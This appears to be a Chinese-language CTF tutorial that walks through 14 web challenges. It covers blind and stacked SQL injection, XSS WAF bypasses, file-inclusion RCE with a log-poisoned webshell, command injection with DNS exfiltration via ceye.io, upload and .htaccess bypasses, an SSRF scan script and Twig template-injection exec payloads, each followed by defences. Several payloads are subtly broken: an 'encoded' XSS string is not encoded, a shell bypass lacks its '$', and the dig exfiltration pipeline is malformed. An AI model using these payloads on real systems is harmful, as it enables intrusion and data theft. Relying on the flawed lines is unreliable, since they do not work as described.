2025年CTF竞赛Web安全中难度真实题目解析

引言

在CTF竞赛中，中难度Web安全题目是连接基础与高级的重要桥梁。这类题目不仅考察选手对基本漏洞的理解，还要求选手掌握更复杂的漏洞利用技巧、工具使用和代码分析能力。本文将详细解析2025年CTF竞赛中出现的Web安全中难度真实题目，帮助读者提升Web安全技能，为解决高难度题目打下基础。

中难度题目特点

中难度Web安全题目通常具有以下特点：

• 漏洞更加隐蔽，需要深入分析才能发现
• 存在多重防御机制，需要绕过多种过滤
• 涉及更多的Web技术细节和特性
• 常与其他领域知识结合出题
• 对工具使用和手工测试能力要求更高

目录

目录
├── 第一章：高级SQL注入技巧
├── 第二章：复杂XSS攻击与防御绕过
├── 第三章：高级文件包含漏洞利用
├── 第四章：命令执行高级技巧
├── 第五章：文件上传绕过与突破
├── 第六章：CSRF与SSRF漏洞深度利用
├── 第七章：Web框架安全漏洞分析
└── 第八章：学习总结与进阶指导

第一章：高级SQL注入技巧

题目1：盲注的艺术

题目描述：目标网站存在SQL注入漏洞，但不会直接显示错误信息，尝试通过盲注获取数据库信息。

难度级别：⭐⭐⭐

解题思路：

1. 判断是否存在基于时间的盲注
2. 利用时间延迟函数构造条件语句
3. 通过观察响应时间推断信息
4. 编写脚本自动化获取数据

解题过程：

1. 访问目标网站，发现URL为http://example.com/product.php?id=1
2. 尝试添加单引号，页面无明显变化
3. 尝试基于时间的盲注：id=1' AND SLEEP(5)--+，发现页面响应时间明显增加
4. 确认存在基于时间的盲注漏洞
5. 编写Python脚本自动化获取数据库信息：

import requests
import time

url = "http://example.com/product.php?id=1' AND (SELECT IF(SUBSTRING((SELECT DATABASE()),1,1)='a',SLEEP(3),0))--+"

# 获取数据库名
db_name = ""
for i in range(1, 20):
    for c in 'abcdefghijklmnopqrstuvwxyz0123456789_{}':
        payload = f"1' AND (SELECT IF(SUBSTRING((SELECT DATABASE()),{i},1)='{c}',SLEEP(2),0))--+"
        start_time = time.time()
        requests.get(url.replace("1' AND (SELECT IF(SUBSTRING((SELECT DATABASE()),1,1)='a',SLEEP(3),0))--+", payload))
        end_time = time.time()
        if end_time - start_time > 1.5:
            db_name += c
            print(f"Database name so far: {db_name}")
            break
    if len(db_name) < i:
        break

print(f"Database name: {db_name}")

# 类似地获取表名、字段名和数据

1. 最终获取到flag：FLAG{BLIND_SQL_INJECTION_REQUIRES_PATIENCE}

原理分析：

基于时间的盲注是一种高级SQL注入技术，攻击者通过添加延时函数（如SLEEP()、WAITFOR DELAY等）来判断SQL语句是否被执行。这种注入方式适用于那些不直接显示错误信息的网站，通过观察响应时间的变化来推断数据库信息。

防御措施：

• 使用参数化查询或预处理语句
• 限制数据库查询的执行时间
• 对用户输入进行严格的验证和过滤
• 实施Web应用防火墙（WAF）

题目2：堆叠查询的利用

题目描述：目标网站存在SQL注入漏洞，尝试使用堆叠查询执行多条SQL语句。

难度级别：⭐⭐⭐

解题思路：

1. 判断是否支持堆叠查询
2. 构造堆叠查询payload
3. 执行多条SQL语句获取信息或修改数据

解题过程：

1. 访问目标网站，URL为http://example.com/search.php?q=test
2. 尝试使用分号分隔多条SQL语句：q=test'; SELECT SLEEP(5)--+
3. 发现页面响应时间明显增加，确认支持堆叠查询
4. 尝试创建一个新的管理员账户：q=test'; INSERT INTO users (username, password, role) VALUES ('hacker', 'password', 'admin')--+
5. 使用新创建的账户登录，在管理员页面找到flag：FLAG{STACKED_QUERIES_ARE_POWERFUL}

原理分析：

堆叠查询允许在一个请求中执行多条SQL语句，通过分号（;）分隔。这种技术的危害很大，攻击者可以执行任意SQL语句，包括查询、插入、更新、删除等操作，甚至可以修改数据库结构。

防御措施：

• 禁止使用堆叠查询
• 使用参数化查询或预处理语句
• 对用户输入进行严格的验证和过滤
• 实施最小权限原则，限制数据库用户的操作权限

第二章：复杂XSS攻击与防御绕过

题目3：绕过WAF的XSS攻击

题目描述：目标网站部署了Web应用防火墙（WAF），尝试绕过WAF执行XSS攻击。

难度级别：⭐⭐⭐⭐

解题思路：

1. 识别WAF的过滤规则
2. 使用各种编码和变形技术绕过过滤
3. 构造复杂的XSS payload

解题过程：

1. 访问目标网站的留言板功能，尝试输入基本的XSS payload：<script>alert('XSS')</script>
2. 发现被WAF拦截，返回"Potential XSS attack detected"
3. 尝试各种变形和编码技术：
   • 使用HTML实体编码：<script>alert('XSS')</script>
   • 使用大小写混合：<ScRiPt>alert('XSS')</ScRiPt>
   • 使用注释绕过：<script<!--test--> >alert('XSS')</script>
   • 使用事件处理器：<img src=x onerror=alert('XSS')>
4. 最终发现使用Unicode编码可以绕过WAF：<img src=x onerror=\u0061lert('XSS')>
5. 提交留言后，成功弹出alert对话框，获取flag：FLAG{WAF_BYPASS_REQUIRES_CREATIVITY}

原理分析：

现代WAF通常使用正则表达式或特征匹配来检测XSS攻击，但这些规则往往存在绕过的可能性。攻击者可以通过各种编码技术、变形技术和混淆技术，构造复杂的XSS payload来绕过WAF的检测。

防御措施：

• 实施多层防御机制，包括输入验证、输出编码、CSP等
• 定期更新WAF规则库
• 对所有用户输入进行严格的验证和过滤
• 对输出到页面的内容进行适当的编码

题目4：DOM型XSS的利用

题目描述：目标网站存在DOM型XSS漏洞，尝试利用它执行JavaScript代码。

难度级别：⭐⭐⭐

解题思路：

1. 分析页面的JavaScript代码
2. 识别可控的DOM元素和属性
3. 构造URL触发DOM型XSS

解题过程：

1. 访问目标网站，查看页面源代码，发现以下JavaScript代码：

function showMessage() {
    var message = decodeURIComponent(location.hash.substr(1));
    document.getElementById('message').innerHTML = message;
}
window.onload = showMessage;
window.onhashchange = showMessage;

1. 分析代码，发现页面从URL的hash部分获取内容，并使用innerHTML设置到页面上
2. 构造恶意URL：http://example.com/domxss.html#<img src=x onerror=alert('XSS')>
3. 访问该URL，成功弹出alert对话框
4. 构造更复杂的payload，窃取管理员cookie，最终获取flag：FLAG{DOM_XSS_ATTACK}

原理分析：

DOM型XSS是一种特殊的XSS漏洞，它不涉及服务器端的处理，而是通过修改页面的DOM结构来执行恶意脚本。这种漏洞通常出现在使用JavaScript动态更新页面内容的Web应用中。

防御措施：

• 对所有用户可控的DOM操作进行验证和过滤
• 使用安全的DOM API，如textContent代替innerHTML
• 实施内容安全策略（CSP）
• 对URL参数和hash值进行适当的编码和验证

第三章：高级文件包含漏洞利用

题目5：PHP封装协议的高级利用

题目描述：目标网站存在文件包含漏洞，尝试使用PHP封装协议执行代码。

难度级别：⭐⭐⭐⭐

解题思路：

1. 测试文件包含漏洞的存在
2. 尝试使用不同的PHP封装协议
3. 构造payload执行远程代码

解题过程：

1. 访问目标网站，URL为http://example.com/index.php?file=home
2. 尝试基本的文件包含payload，确认漏洞存在
3. 尝试使用data://协议执行PHP代码：file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOyA/Pg==（base64编码的<?php system('ls'); ?>）
4. 发现页面显示了当前目录下的文件列表
5. 尝试执行更复杂的命令：file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy50eHQnKTsgPz4=
6. 成功读取到flag：FLAG{PHP_WRAPPERS_RCE}

原理分析：

PHP提供了多种封装协议（wrapper），如data://、php://input、phar://等，这些协议可以用于读取文件内容、执行代码等。在文件包含漏洞中，攻击者可以利用这些协议来执行远程代码，绕过一些安全限制。

防御措施：

• 禁用不必要的PHP封装协议
• 对用户输入进行严格的验证和过滤
• 实施文件路径白名单机制
• 禁用allow_url_include选项

题目6：日志文件包含

题目描述：目标网站存在文件包含漏洞，但无法直接访问敏感文件，尝试利用日志文件。

难度级别：⭐⭐⭐

解题思路：

1. 确定可能的日志文件位置
2. 向日志文件中注入PHP代码
3. 通过文件包含漏洞执行注入的代码

解题过程：

1. 访问目标网站，确认存在文件包含漏洞
2. 尝试包含Web服务器日志文件：file=../var/log/apache2/access.log
3. 发现可以访问日志文件，但内容太多无法直接阅读
4. 构造特殊的User-Agent，向日志文件中注入PHP代码：<?php system($_GET['cmd']); ?>
5. 使用Burp Suite发送请求，设置User-Agent为注入的PHP代码
6. 再次包含日志文件，并添加cmd参数：file=../var/log/apache2/access.log&cmd=ls
7. 成功执行命令，找到并读取flag：FLAG{LOG_FILE_INCLUDE_RCE}

原理分析：

Web服务器的日志文件记录了所有访问请求的信息，包括User-Agent、Referer等字段。如果攻击者能够向这些字段中注入PHP代码，并且能够通过文件包含漏洞包含这些日志文件，那么注入的PHP代码就会被执行。

防御措施：

• 限制文件包含的路径和权限
• 对日志文件进行保护，防止未授权访问
• 对用户输入的HTTP头进行过滤和验证
• 定期清理日志文件

第四章：命令执行高级技巧

题目7：无回显命令执行

题目描述：目标网站存在命令执行漏洞，但不会直接显示命令执行结果，尝试获取flag。

难度级别：⭐⭐⭐⭐

解题思路：

1. 确认命令执行漏洞的存在
2. 使用DNS请求、HTTP请求等方式外带数据
3. 构造特殊的payload获取信息

解题过程：

1. 访问目标网站，URL为http://example.com/exec.php?cmd=ping%20127.0.0.1
2. 确认命令可以执行，但没有显示结果
3. 设置一个DNSlog服务（如ceye.io），获取一个子域名
4. 构造payload，将命令执行结果通过DNS请求外带：cmd=ping%20$(whoami).xxxx.ceye.io
5. 查看DNSlog记录，成功获取到当前用户名
6. 继续构造payload获取flag：cmd=cat%20flag.txt%20|%20base64%20|%20xargs%20-n1%20-echo%20|%20sed%20's/\/\/./\./g'|%20xargs%20-n1%20-echo%20|%20xargs%20dig%20@8.8.8.8
7. 在DNSlog记录中解码得到flag：FLAG{BLIND_COMMAND_EXECUTION}

原理分析：

无回显命令执行是一种常见的安全挑战，攻击者无法直接看到命令执行的结果。在这种情况下，可以使用各种外带数据的技术，如DNS请求、HTTP请求、SMTP请求等，将命令执行结果发送到攻击者控制的服务器上。

防御措施：

• 避免直接执行用户可控的系统命令
• 实施命令白名单机制
• 对用户输入进行严格的过滤和验证
• 监控和限制服务器的出站网络连接

题目8：命令执行绕过与编码

题目描述：目标网站的命令执行功能进行了严格的过滤，尝试使用各种绕过技巧执行命令。

难度级别：⭐⭐⭐⭐

解题思路：

1. 识别过滤规则和限制
2. 使用各种编码技术和绕过方法
3. 构造复杂的payload执行命令

解题过程：

1. 访问目标网站的命令执行功能，测试各种命令和分隔符，发现大部分都被过滤
2. 尝试使用bash的内置变量和命令替换：cmd={PATH:0:1}s{PATH:0:1}（执行ls命令）
3. 成功执行命令，发现flag.txt文件
4. 尝试读取flag.txt，但cat、more等命令被过滤
5. 尝试使用其他方法读取文件：cmd=tac${IFS}fla*（tac是cat的反向命令）
6. 成功读取到flag：FLAG{COMMAND_EXECUTION_BYPASS_MASTER}

原理分析：

命令执行绕过是一种高级技巧，攻击者需要熟悉操作系统的命令行特性、shell语法和各种编码方法。常见的绕过技巧包括使用变量替换、命令连接、特殊字符、编码和变形等。

防御措施：

• 实施命令白名单机制，只允许执行预定义的安全命令
• 对用户输入进行全面的过滤，包括各种可能的编码和变形
• 使用安全的API代替直接执行系统命令
• 以最小权限运行Web应用

第五章：文件上传绕过与突破

题目9：多维度文件上传绕过

题目描述：目标网站的文件上传功能实施了多重验证，尝试绕过这些验证上传WebShell。

难度级别：⭐⭐⭐⭐

解题思路：

1. 分析文件上传的验证机制
2. 识别各个验证环节的弱点
3. 构造特殊的文件绕过所有验证

解题过程：

1. 访问文件上传页面，测试各种文件类型，发现以下验证：
   • 前端JavaScript验证文件扩展名
   • 服务端验证Content-Type
   • 服务端验证文件扩展名
   • 服务端验证文件头
   • 服务端验证文件内容
2. 使用Burp Suite拦截上传请求，构造包含以下特征的文件：
   • 合法的图片文件头（GIF89a）
   • PHP代码隐藏在图片数据中
   • 使用特殊的文件扩展名（如.pht、.phar）
   • 修改Content-Type为image/gif
3. 尝试上传构造的文件，发现.pht扩展名未被过滤
4. 成功上传WebShell，通过URL访问：http://example.com/uploads/shell.pht
5. 执行命令获取flag：FLAG{MULTI_LAYER_FILE_UPLOAD_BYPASS}

原理分析：

多维度文件上传绕过需要攻击者同时绕过前端验证、服务端的文件类型验证、文件扩展名验证、文件头验证和文件内容验证。攻击者通常需要构造一个包含合法文件特征但又包含恶意代码的文件，利用验证机制的漏洞成功上传。

防御措施：

• 实施多层验证机制，包括前端验证和服务端验证
• 使用白名单机制，只允许上传特定类型的文件
• 对上传的文件进行全面的内容扫描和分析
• 对上传的文件进行随机重命名
• 限制上传目录的执行权限

题目10：.htaccess文件利用

题目描述：目标网站允许上传.htaccess文件，尝试利用它执行PHP代码。

难度级别：⭐⭐⭐

解题思路：

1. 确认是否可以上传.htaccess文件
2. 构造特殊的.htaccess文件
3. 上传普通文件并使其被当作PHP执行

解题过程：

1. 访问文件上传页面，尝试上传.htaccess文件，发现可以上传
2. 构造.htaccess文件，内容如下：

AddType application/x-httpd-php .jpg

1. 上传该.htaccess文件
2. 上传一个包含PHP代码的jpg文件
3. 访问上传的jpg文件，发现被当作PHP执行
4. 执行命令获取flag：FLAG{HTACCESS_EXPLOITATION}

原理分析：

.htaccess文件是Apache Web服务器的配置文件，它可以用来配置目录级别的访问控制、URL重写、文件类型等。如果攻击者能够上传.htaccess文件，就可以修改服务器的配置，例如将jpg文件设置为PHP文件执行。

防御措施：

• 禁止上传.htaccess、.user.ini等配置文件
• 限制Web服务器的配置权限
• 实施严格的文件上传验证机制
• 定期检查和恢复Web服务器的配置文件

第六章：CSRF与SSRF漏洞深度利用

题目11：高级CSRF攻击

题目描述：目标网站实施了CSRF令牌保护，但存在一些缺陷，尝试绕过这些保护发起CSRF攻击。

难度级别：⭐⭐⭐⭐

解题思路：

1. 分析CSRF令牌的生成和验证机制
2. 识别令牌验证的缺陷
3. 构造特殊的CSRF攻击向量

解题过程：

1. 访问目标网站，分析CSRF令牌的生成和使用方式
2. 发现CSRF令牌与用户会话绑定，但在某些情况下令牌没有被正确验证
3. 构造一个包含XSS payload的页面，当用户访问该页面时，XSS payload会：
   • 读取当前页面的CSRF令牌
   • 构造一个包含正确令牌的CSRF请求
   • 自动提交请求执行恶意操作
4. 通过社会工程学手段诱导管理员访问该页面
5. 管理员访问后，成功执行了恶意操作，获取flag：FLAG{ADVANCED_CSRF_ATTACK}

原理分析：

高级CSRF攻击通常结合了其他漏洞（如XSS）或利用了CSRF保护机制的缺陷。在这个例子中，攻击者通过XSS漏洞获取了用户的CSRF令牌，然后使用该令牌构造合法的CSRF请求，绕过了CSRF保护机制。

防御措施：

• 正确实现CSRF令牌保护机制
• 对所有敏感操作实施CSRF保护
• 同时实施其他防御措施，如SameSite Cookie、Referer检查等
• 防止XSS等其他漏洞的存在，避免CSRF令牌被窃取

题目12：SSRF与内网探测

题目描述：目标网站存在SSRF漏洞，尝试利用它探测内网服务并获取信息。

难度级别：⭐⭐⭐⭐

解题思路：

1. 确认SSRF漏洞的存在
2. 构造特殊的payload探测内网服务
3. 利用内网服务的漏洞获取信息

解题过程：

1. 访问目标网站，发现一个可以发起远程请求的功能，URL为http://example.com/fetch.php?url=http://example.com
2. 尝试访问内网地址：url=http://127.0.0.1，发现可以访问
3. 编写脚本扫描内网IP和端口：

import requests

for ip in range(1, 255):
    for port in [80, 8080, 443, 3306, 22]:
        target = f"http://192.168.1.{ip}:{port}"
        payload = f"http://example.com/fetch.php?url={target}"
        try:
            response = requests.get(payload, timeout=2)
            if response.status_code == 200:
                print(f"Found service at {target}")
        except:
            pass

1. 发现内网中的一个MySQL服务器和一个Web服务器
2. 尝试访问内网Web服务器：url=http://192.168.1.100:8080/admin
3. 在管理员页面发现flag：FLAG{SSRF_INTERNAL_NETWORK_EXPLORATION}

原理分析：

SSRF（服务器请求伪造）是一种允许攻击者诱导服务器发送请求到攻击者控制的目标的漏洞。这种漏洞的危害很大，攻击者可以利用它来访问服务器所在内网的资源，探测内网结构，甚至攻击内网中的其他系统。

防御措施：

• 禁止不必要的协议和功能
• 实施IP白名单和域名白名单机制
• 对用户提供的URL进行严格的验证和过滤
• 限制服务器的出站网络连接
• 监控和记录所有的远程请求

第七章：Web框架安全漏洞分析

题目13：框架特定漏洞利用

题目描述：目标网站使用了特定的Web框架，尝试利用该框架的已知漏洞获取flag。

难度级别：⭐⭐⭐⭐

解题思路：

1. 识别目标网站使用的Web框架和版本
2. 查找该框架的已知漏洞
3. 构造特定的payload利用漏洞

解题过程：

1. 访问目标网站，查看响应头、页面源代码等信息，识别出使用的是Laravel 8.4.2框架
2. 查找Laravel 8.4.2的已知漏洞，发现存在一个反序列化漏洞（CVE-2021-3129）
3. 下载并使用公开的漏洞利用工具，生成序列化的payload
4. 构造请求，将payload发送到存在漏洞的接口
5. 成功执行远程代码，获取flag：FLAG{FRAMEWORK_VULNERABILITY_EXPLOITATION}

原理分析：

Web框架特定漏洞是指存在于特定Web框架中的安全漏洞，如反序列化漏洞、远程代码执行漏洞、SQL注入漏洞等。这些漏洞通常是由于框架的设计缺陷或实现错误导致的，攻击者可以利用这些漏洞获取服务器的控制权限。

防御措施：

• 及时更新Web框架到最新版本
• 应用所有的安全补丁
• 禁用不必要的框架功能和组件
• 实施严格的输入验证和输出编码
• 定期进行安全审计和漏洞扫描

题目14：模板注入漏洞

题目描述：目标网站使用了模板引擎，尝试利用模板注入漏洞执行代码。

难度级别：⭐⭐⭐⭐

解题思路：

1. 识别目标网站使用的模板引擎
2. 测试是否存在模板注入漏洞
3. 构造特定的payload执行代码

解题过程：

1. 访问目标网站，发现URL中包含一个name参数：http://example.com/welcome.php?name=Guest
2. 页面显示"Welcome, Guest!"，怀疑使用了模板引擎
3. 尝试输入模板语法测试：name={{7*7}}，页面显示"Welcome, 49!"，确认存在模板注入漏洞
4. 进一步测试，发现使用的是Twig模板引擎
5. 构造payload执行命令：name={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
6. 页面显示当前用户的id信息，确认可以执行命令
7. 构造payload获取flag：name={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag.txt")}}
8. 成功获取到flag：FLAG{TEMPLATE_INJECTION_RCE}

原理分析：

模板注入漏洞是指攻击者可以控制模板引擎的输入，从而执行任意代码或获取敏感信息。这种漏洞通常出现在使用模板引擎动态生成页面内容的Web应用中，攻击者可以通过构造特殊的模板语法来执行代码。

防御措施：

• 避免将用户输入直接插入到模板中
• 使用安全的模板引擎，并应用所有的安全补丁
• 对用户输入进行严格的验证和过滤
• 实施最小权限原则，限制模板引擎的执行权限
• 定期进行安全审计和漏洞扫描

第八章：学习总结与进阶指导

8.1 中难度题目总结

通过解析这些中难度的Web安全题目，我们可以总结出以下几点：

1. 漏洞更加隐蔽复杂：中难度题目中的漏洞通常更加隐蔽，需要深入分析和测试才能发现
2. 多重防御需要绕过：这类题目往往实施了多重防御机制，需要攻击者掌握多种绕过技巧
3. 工具使用更加熟练：解决中难度题目需要更加熟练地使用各种安全工具
4. 代码分析能力要求高：分析源代码、识别漏洞和构造payload的能力至关重要
5. 综合知识应用：中难度题目往往涉及多个领域的知识，需要综合应用

8.2 进阶学习建议

对于想要提升Web安全技能的选手，以下是一些进阶学习建议：

1. 深入学习编程语言：掌握PHP、Python、JavaScript等编程语言的特性和安全问题
2. 学习Web框架安全：了解常见Web框架（如Laravel、Django、Flask等）的安全特性和漏洞
3. 掌握高级漏洞利用技术：学习XXE、反序列化、模板注入等高级漏洞的利用技巧
4. 学习代码审计：掌握如何审计Web应用代码，识别潜在的安全漏洞
5. 关注安全研究：阅读最新的安全研究论文和博客，了解前沿的安全技术

8.3 高级工具推荐

以下是一些在解决中难度Web安全题目时常用的高级工具：

• Burp Suite Pro：专业版Burp Suite提供了更多高级功能，如Intruder、Scanner等
• SQLMap：自动化SQL注入工具，支持多种注入方式和数据库
• XSSER：自动化XSS攻击工具
• Ghidra：开源的逆向工程工具，可以用于分析二进制文件
• radare2：开源的命令行逆向工程工具
• OWASP ZAP：开源的Web应用安全扫描工具
• Metasploit：开源的渗透测试框架，包含大量的漏洞利用模块

参考文献

1. OWASP Top 10
2. Web Security Academy
3. CTF Wiki
4. Hacker101
5. The Web Application Hacker’s Handbook
6. Real-World Bug Hunting
7. PHP Security
8. JavaScript Security
9. HTTP/2 in Action
10. Database Hacker’s Handbook
11. Web Hacking 101
12. Advanced Web Attacks and Exploitation
13. Secure Coding in PHP
14. JavaScript for Penetration Testers
15. The Tangled Web